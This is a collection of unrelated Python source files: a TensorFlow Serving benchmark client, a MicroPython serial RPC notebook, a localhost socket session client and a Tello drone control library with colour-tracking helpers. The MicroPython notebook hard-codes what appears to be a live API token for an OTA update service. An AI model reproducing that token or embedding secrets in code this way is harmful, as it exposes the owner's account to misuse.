    result = stub.Predict(request, 60.0)  # 60 secs timeout
# print(result)
end = time.time()
duration = (end - start)
print("it takes %s sec" % str(duration))
if (k != 0 and k != 3 and k != 8):
durationSum += duration
# sys.stdout.write('.')
# sys.stdout.flush()
print("[Warm up] on average, it takes %s sec to run a batch of %d images over %d runs" % (str(durationSum / (runNum - 3)), batchSize, (runNum - 3)))
def myFuncParallel(stub, i):
request = predict_pb2.PredictRequest()
request.model_spec.name = 'caffe_googlenet'
request.model_spec.signature_name = 'predict_images'
batchSize = 100
durationSum = 0.0
runNum = 10
for k in range(runNum):
image_data = []
start = time.time()
for j in range(batchSize):
image = "/home/yitao/Downloads/inception-input/%s/dog-%s.jpg" % (str(i % 100).zfill(3), str(j).zfill(3))
with open(image, 'rb') as f:
image_data.append(f.read())
request.inputs['images'].CopyFrom(
tf.contrib.util.make_tensor_proto(image_data, shape=[len(image_data)]))
    result = stub.Predict(request, 60.0)  # 60 secs timeout
# print(result)
end = time.time()
duration = (end - start)
print("[thread-%d] it takes %s sec" % (i, str(duration)))
# if (k != 0 and k != 3 and k != 8):
if True:
durationSum += duration
# sys.stdout.write('.')
# sys.stdout.flush()
print("[Parallel-thread-%d] on average, it takes %s sec to run a batch of %d images over %d runs" % (i, str(durationSum / runNum), batchSize, runNum))
def main(_):
# start = time.time()
host, port = FLAGS.server.split(':')
channel = implementations.insecure_channel(host, int(port))
stub = prediction_service_pb2.beta_create_PredictionService_stub(channel)
# run Inception job
myFuncWarmUp(stub, 0)
num_tests = 0
tPool = []
for i in range(num_tests):
tPool.append(threading.Thread(target = myFuncParallel, args = (stub, i)))
start = time.time()
for i in range(num_tests):
t = tPool[i]
t.start()
# time.sleep(2.0)
for i in range(num_tests):
t = tPool[i]
t.join()
end = time.time()
print('\nFinished!')
print('[Parallel] The total running time to run %d concurrent jobs is %s' % (num_tests, str(end - start)))
if __name__ == '__main__':
tf.app.run()
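# Hedged usage sketch (not part of the original client); the server address is
# a placeholder and the image layout is taken from the hard-coded paths above:
#   python caffe_googlenet_client.py --server=localhost:9000
# myFuncWarmUp() then reads batches of JPEGs from
# /home/yitao/Downloads/inception-input/<NNN>/dog-<NNN>.jpg and sends them to
# the 'caffe_googlenet' model through the PredictionService stub.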
|
MicroPython simple RPC - Host PC.py
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import asyncio
import functools as ft
import json
import platform
import threading
import asyncserial
async def wrap_background_loop(func, serial_loop, *args, **kwargs):
loop = asyncio.get_event_loop()
co_result = asyncio.Event()
def co_func():
async def _func(*args, **kwargs):
try:
co_result.result = await func(*args, **kwargs)
except Exception as exception:
co_result.result = exception
finally:
loop.call_soon_threadsafe(co_result.set)
serial_loop.create_task(_func(*args, **kwargs))
serial_loop.call_soon_threadsafe(co_func)
await co_result.wait()
if isinstance(co_result.result, Exception):
raise co_result.result
else:
return co_result.result
class BackgroundSerialAsync:
def __init__(self, *args, **kwargs):
loop_started = threading.Event()
def start():
if platform.system() == 'Windows':
# Need to use Proactor (IOCP) event loop for serial port.
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
self.device = asyncserial.AsyncSerial(*args, loop=loop, **kwargs)
self.loop = loop
loop.call_soon(loop_started.set)
loop.run_forever()
self.thread = threading.Thread(target=start)
self.thread.daemon = True
self.thread.start()
loop_started.wait()
def write(self, *args, **kwargs):
return wrap_background_loop(self.device.write, self.loop, *args, **kwargs)
def read_exactly(self, *args, **kwargs):
return wrap_background_loop(self.device.read_exactly, self.loop, *args, **kwargs)
def read(self, *args, **kwargs):
return wrap_background_loop(self.device.read, self.loop, *args, **kwargs)
async def readline(self):
data = b''
while True:
data += await self.read(1)
if data and data[-1] == ord(b'\n'):
return data
def close(self):
self.loop.call_soon_threadsafe(self.device.close)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
# +
import sys
import serial
import json
class RemoteBase:
def __init__(self, device):
self.device = device
def _base_call(self, base_message, command, *args, **kwargs):
raise NotImplementedError
def call(self, command, *args, **kwargs):
return self._base_call({}, command, *args, **kwargs)
def await_(self, command, *args, **kwargs):
return self._base_call({'async': True}, command, *args, **kwargs)
def create_task(self, command, *args, **kwargs):
return self._base_call({'async': 'task'}, command, *args, **kwargs)
class Remote(RemoteBase):
def _base_call(self, base_message, command, *args, **kwargs):
message = base_message.copy()
message.update({'command': command, 'args': args,
'kwargs': kwargs})
self.device.write(json.dumps(message).encode('utf8') + b'\r\n')
response = json.loads(self.device.readline())
if 'error' in response:
raise RuntimeError('Error: `%s`' % response['error'])
return response['result']
class AsyncRemote(RemoteBase):
async def _base_call(self, base_message, command, *args, **kwargs):
message = base_message.copy()
message.update({'command': command, 'args': args,
'kwargs': kwargs})
await self.device.write(json.dumps(message).encode('utf8') + b'\r\n')
response = json.loads(await self.device.readline())
if 'error' in response:
raise RuntimeError('Error: `%s`' % response['error'])
return response['result']
# -
with BackgroundSerialAsync(port='COM18', baudrate=115200) as adevice:
aremote = AsyncRemote(adevice)
await aremote.call('gc.collect')
display(await aremote.call('gc.mem_free'))
with serial.Serial('COM18', baudrate=115200) as device:
remote = Remote(device)
remote.call('gc.collect')
display(remote.call('gc.mem_free'))
# +
API_TOKEN = 'c8005277d02736892f49d9e5402b73ded68fba9d'
with BackgroundSerialAsync(port='COM18', baudrate=115200) as adevice:
aremote = AsyncRemote(adevice)
# await aremote.call('ota.fetch_update', API_TOKEN, tag='v0.4')
# await aremote.call('ota.swap', '/ota-previous', '', '/ota-next')
# await aremote.call('open("/VERSION").read')
# print(await aremote.call('eval', 'dir(ota)'))
print(await aremote.call('ota.latest_version', API_TOKEN))
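# Sketch of the line-oriented JSON protocol implied by Remote/AsyncRemote above
# (added for illustration; the command and values are hypothetical). Each call
# writes one JSON line and reads one JSON line back:
#   -> {"command": "gc.mem_free", "args": [], "kwargs": {}}
#   <- {"result": 101712}
# An error on the MicroPython side comes back as {"error": "..."} and is
# re-raised locally as a RuntimeError.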
|
request_session.py
|
import socket
import json
import threading
import time
import select
import sys
import signal
import os
import argparse
s = None
t1 = None
def prGreen(skk): print("\033[92m {}\033[00m".format(skk))
def receive_data():
global s
global session_type
    while True: # checking whether the first message has been received
ready = select.select([s], [], [], 5)
if ready[0]:
data_r= s.recv(1024)
if data_r.decode().strip() == "":
return
prGreen(data_r.decode())
if data_r.decode().startswith('Client is stopping,'):
return
break
# else:
# print("No response, maybe client is disconnected, please close this session if client is not running")
while True:
data_r = s.recv(1024)
if data_r.decode().strip() == "":
return
prGreen(data_r.decode())
if data_r.decode().startswith('Client is stopping,'):
return
def send_data():
global t1
    while t1.is_alive():
i, o, e = select.select( [sys.stdin], [], [], 1 )
if i:
str_in = sys.stdin.readline().strip()
s.send(str_in.encode())
else:
pass
def signal_handler(sig, frame):
print("Force exit")
pid = os.getpid()
os.kill(pid, signal.SIGKILL)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
# signal.signal(signal.SIGKILL, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--device', help='device name',
required=True)
parser.add_argument('-sk', '--secret_key', help='secret key',
required=True)
parser.add_argument('-s', '--session', help='session type')
args = parser.parse_args()
device = args.device
secret_key = args.secret_key
session_type = args.session or 'csh'
device = device.strip()
s = socket.socket()
while 1:
try:
with open('server_data.json', 'r') as f1:
server_data = json.load(f1)
port = server_data[device]
s.connect(('localhost', int(port)))
# print("connected")
s.send((session_type + ":" + secret_key).encode())
# print("first message is sent")
break
except:
# print("client is not connected or server is not running, retrying after 2s")
time.sleep(2)
ready = select.select([s], [], [], 5)
if ready[0]:
data_rec = s.recv(1024)
if data_rec.decode().strip() == "wrong secret key":
print("incorrect secret")
sys.exit(0)
else:
# print("Secret matched, client is authenticated")
pass
else:
# print("No response, maybe server is not running")
sys.exit(0)
t1 = threading.Thread(target=receive_data)
t1.start()
t2 = threading.Thread(target=send_data)
t2.start()
if session_type == "csh":
print("$ "),
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import imutils
import cv2
import pygame
import numpy as np
from enum import IntEnum
from threading import Thread
from djitellopy.decorators import accepts
from djitellopy.game_events import GameEvents
class State(IntEnum):
idle = 0
yawing = 1
flipping = 2
initializing = 10
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 10 # in seconds
TIME_BTW_COMMANDS = 1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
RETRY_COUNT = 3
last_received_command = time.time()
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.WARNING)
# use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
STATE_UDP_PORT = 8890
# VideoCapture object
cap = None
background_frame_read = None
stream_on = False
def __init__(self,
host='192.168.10.1',
port=8889,
client_socket=None,
enable_exceptions=True,
retry_count=10):
self.address = (host, port)
self.response = None
        self.response_state = None  # holds the latest state response received from the Tello
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
self.idle = State.idle
if client_socket:
self.clientSocket = client_socket
else:
self.clientSocket = socket.socket(
socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(
('', self.UDP_PORT)) # For UDP response (receiving data)
self.stateSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.stateSocket.bind(
('', self.STATE_UDP_PORT)) # for accessing the states of Tello
        # Run Tello UDP response receiver in the background
        thread1 = threading.Thread(target=self.run_udp_receiver, args=())
        # Run state receiver in the background
        thread2 = threading.Thread(target=self.get_states, args=())
thread1.daemon = True
thread2.daemon = True
thread1.start()
thread2.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(
1024) # buffer size is 1024 bytes
except Exception as e:
self.LOGGER.error(e)
break
def get_states(self):
"""This runs on background to recieve the state of Tello"""
while True:
try:
self.response_state, _ = self.stateSocket.recvfrom(128)
except Exception as e:
self.LOGGER.error(e)
break
def get_current_state_all(self):
"""Call this function to attain the states of Tello"""
if self.response_state == 'ok':
return False
else:
return self.response_state.decode('ASCII')
def get_pitch(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[1])
except:
print("Exception in pitch occured")
return 0
def get_roll(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[3])
except:
print("Exception in roll occured")
return 0
def get_yaw(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[5])
except:
print("Exception in yaw occured")
return 0
def get_vgx(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[7])
except:
print("Exception in velocity in x occured")
return 0
def get_vgy(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[9])
except:
print("Exception in velocity in y occured")
return 0
def get_vgz(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[11])
except:
print("Exception in velocity in z occured")
return 0
def get_agx(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[27])
except:
print("Exception in acceleration in x")
return 0
def get_agy(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[29])
except:
print("Exception in acceleration in y")
return 0
def get_agz(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[31])
except:
print("Exception in acceleration in z")
return 0
def get_h(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[19])
except:
print("Exception in height")
return 0
def get_bat(self):
if self.response_state == 'ok':
return False
else:
response = self.get_current_state_all()
response = response.replace(';', ':')
response = response.split(':')
try:
return float(response[21])
except:
print("Exception in battery")
return 50
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(
self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(
self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str)
def send_command_with_return(self, command):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
        # Sending commands in very quick succession makes the drone stop responding,
        # so wait at least self.TIME_BTW_COMMANDS seconds between consecutive commands
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
self.LOGGER.debug('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.RESPONSE_TIMEOUT * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
response = self.response.decode('utf-8').rstrip("\r\n")
self.LOGGER.debug('Response: ' + response)
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
                speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responds false.
                x/y/z can't all be between -20 and 20 at the same time.
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
        # Sending commands in very quick succession can make the drone stop responding;
        # callers should keep at least self.TIME_BTW_COMMANDS seconds between commands
self.LOGGER.debug('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str)
def send_control_command(self, command):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
self.LOGGER.debug(command)
for i in range(0, self.retry_count):
response = self.send_command_with_return(command)
if response == 'OK' or response == 'ok':
return True
elif self.is_moving():
return True
time.sleep(0.2)
return self.return_error_on_send_command(command, response,
self.enable_exceptions)
@accepts(command=str)
def send_read_command(self, command):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
bool: True for successful, False for unsuccessful
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and (
'False' not in response):
if response.isdigit():
return int(response)
else:
try:
return float(
response
) # isdigit() is False when the number is a float(barometer)
except ValueError:
return response
else:
return self.return_error_on_send_command(command, response,
self.enable_exceptions)
@classmethod
def return_error_on_send_command(cl, command, response, enable_exceptions):
"""Returns False and print an informative result code to show unsuccessful response"""
msg = 'Command ' + command + ' was unsuccessful. Message: ' + str(
response)
if enable_exceptions:
raise Exception(msg)
else:
cl.LOGGER.error(msg)
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
return self.send_control_command("takeoff")
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("land")
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return(
'go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
        - If the arc radius is not within the range of 0.5-10 meters, it responds false.
        - x/y/z can't all be between -20 and 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return(
'curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int, y=int, z=int, speed=int, mid=int)
def go_xyz_speed_mid(self, x, y, z, speed, mid):
"""Tello fly to x y z in speed (cm/s) relative to mission pad iwth id mid
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(
'go %s %s %s %s m%s' % (x, y, z, speed, mid))
@accepts(
x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int, mid=int)
def curve_xyz_speed_mid(self, x1, y1, z1, x2, y2, z2, speed, mid):
"""Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('curve %s %s %s %s %s %s %s m%s' %
(x1, y1, z1, x2, y2, z2, speed, mid))
@accepts(x=int, y=int, z=int, speed=int, yaw=int, mid1=int, mid2=int)
def go_xyz_speed_yaw_mid(self, x, y, z, speed, yaw, mid1, mid2):
"""Tello fly to x y z in speed (cm/s) relative to mid1
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(
'jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
return self.send_control_command("mon")
def disable_mission_pads(self):
return self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
return self.send_control_command("mdirection " + str(x))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(
left_right_velocity=int,
forward_backward_velocity=int,
up_down_velocity=int,
yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity,
up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(
time.time() * 1000
) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return(
'rc %s %s %s %s' % (left_right_velocity,
forward_backward_velocity,
up_down_velocity, yaw_velocity))
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('ap %s %s' % (ssid, password))
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self):
"""Get current battery percentage
Returns:
False: Unsuccessful
            int: 0-100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temp?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
r = self.send_read_command('attitude?').replace(';', ':').split(':')
return dict(
zip(r[::2],
[int(i)
for i in r[1::2]])) # {'pitch': xxx, 'roll': xxx, 'yaw': xxx}
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def get_sdk_version(self):
"""Get SDK Version
Returns:
False: Unsuccessful
str: SDK Version
"""
return self.send_read_command('sdk?')
def get_serial_number(self):
"""Get Serial Number
Returns:
False: Unsuccessful
str: Serial Number
"""
return self.send_read_command('sn?')
def is_idle(self):
        return self.get_speed() == 0
def is_moving(self):
return not self.is_idle()
def end(self):
"""Call this method when you want to end the tello object"""
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
def __del__(self):
self.end()
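# Minimal usage sketch for the Tello class above (added for illustration and
# never executed here); distances follow the SDK limits quoted in the docstrings.
def _example_tello_flight():
    drone = Tello()              # binds the command and state UDP sockets
    if drone.connect():          # enter SDK mode ("command")
        print(drone.get_battery())
        drone.takeoff()
        drone.move_up(50)        # 20-500 cm per the docstring
        drone.rotate_clockwise(90)
        drone.land()
    drone.end()                  # release the video stream and capture, if any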
def detectRosePaper(frame) -> bool:
    # define the lower and upper boundaries of the rose-coloured paper in the
    # HSV color space (the bounds below are pink hues despite the "green" variable names)
greenLower = (157, 82, 89)
greenUpper = (173, 190, 225)
# frame = imutils.resize(frame, width=600)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(
mask.copy(),
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE
)
cnts = imutils.grab_contours(cnts)
center = None
if len(cnts) > 0:
# find the largest contour in the mask
c = max(cnts, key=cv2.contourArea)
((x, y), radius) = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 40:
# draw the circle and centroid on the frame,
# then update the list of tracked points
cv2.circle(
frame,
(int(x), int(y)),
int(radius),
(0, 255, 255),
2
)
cv2.circle(frame, center, 5, (0, 0, 255), -1)
return True
return False
def calculateAnchor(frame):
greenLower = (157, 82, 89)
greenUpper = (173, 190, 225)
blurred = cv2.GaussianBlur(frame, (11, 11), 0)
hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, greenLower, greenUpper)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
# find contours in the mask and initialize the current
# (x, y) center of the ball
cnts = cv2.findContours(
mask.copy(),
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE
)
cnts = imutils.grab_contours(cnts)
center = None
if len(cnts) > 0:
# find the largest contour in the mask
c = max(cnts, key=cv2.contourArea)
_, radius = cv2.minEnclosingCircle(c)
M = cv2.moments(c)
center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"]))
# only proceed if the radius meets a minimum size
if radius > 20:
return center
return None
def getDirectionFromPoints(points):
directions = []
if len(points) < 10:
return directions
# if either of the tracked points are None, ignore
# them
if points[0] is None or points[1] is None or points[-10] is None:
return directions
# compute the difference between the x and y
# coordinates and re-initialize the direction
# text variables
dX = points[-10][0] - points[0][0]
dY = points[-10][1] - points[0][1]
direction = ""
# ensure there is significant movement in the
# x-direction
if np.abs(dX) >= np.abs(dY):
if np.abs(dX) > 20:
direction = "East" if np.sign(dX) == 1 else "West"
elif np.abs(dY) > 20:
direction = "North" if np.sign(dY) == 1 else "South"
return direction
def most_common(lst):
cleared = [elem for elem in lst if elem != '']
if not len(cleared) > 0:
return ''
return max(set(cleared), key=lst.count)
